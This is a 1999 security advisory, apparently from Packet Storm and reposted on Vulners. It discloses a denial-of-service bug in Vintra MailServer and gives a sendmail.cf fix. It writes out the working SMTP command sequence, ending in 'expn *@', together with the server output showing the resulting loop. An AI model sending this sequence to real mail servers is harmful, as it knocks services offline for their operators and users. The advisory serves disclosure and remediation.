Lucene search
K

vintra.txt

🗓️ 17 Aug 1999 00:00:00Reported by Packet StormType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 29 Views

Remote exploit in Vintra MailServer causing high CPU and memory usage due to infinite loop bug.

Code
`From: Vytis Fedaravicius <[email protected]>  
Subject: DOS in Vintra systems Mailserver software.  
  
Hello,  
  
There is a bug in a free MailServer software for Windows NT from Vintra  
systems ( http://www.vintra.com/mailsrvr.html ). Any remote user can cause  
MTA to go nuts and make CPU ussage up to 99%, eat all available memory and  
disk space.  
  
Bug: one opens telnet to 25 port, issues helo, mail from: and rcpt to:  
commands, and instead of data command uses expn *@. Softwarre goes in a  
infinite loop.  
  
Fix: disable expn command by editing sendmail.cf. Add the folowing line  
and restart mta service.  
  
O PrivacyOptions=needmailhelo, noexpn  
  
  
Exploit (commands to enter are marked ">")  
  
>telnet vulnerable.server.dom 25  
  
220 vulnerable.server.dom ESMTP Sendmail 8.8.8/8.8.7; Mon, 20 Jul 1998  
20:18:20 +0200 (Central Europe Daylight Time)  
  
>helo EvilOne  
  
250 vulnerable.server.dom Hello Administrators@localhost, pleased to meet  
you  
  
>mail from:bad.boy  
  
250 bad.boy... Sender ok  
  
>rcpt to:resourceLeaker  
  
550 resourceLeaker... User unknown  
  
>expn *@  
  
550 *@... User unknown  
550 bad.boy... User unknown  
550 bad.boy... User unknown  
...hundreds of these lines gets logged and memory is allocated, cpu ussage  
increases wildly  
  
550 bad.boy... User unknown  
550 bad.boy... User unknown  
....  
  
This software is sendmail based, so may be other implementations are  
vulnerable also? Vintra systems were notified  
  
  
Vytis Fedaravicius  
System administrator  
Omnitel  
  
e-mail: [email protected]  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation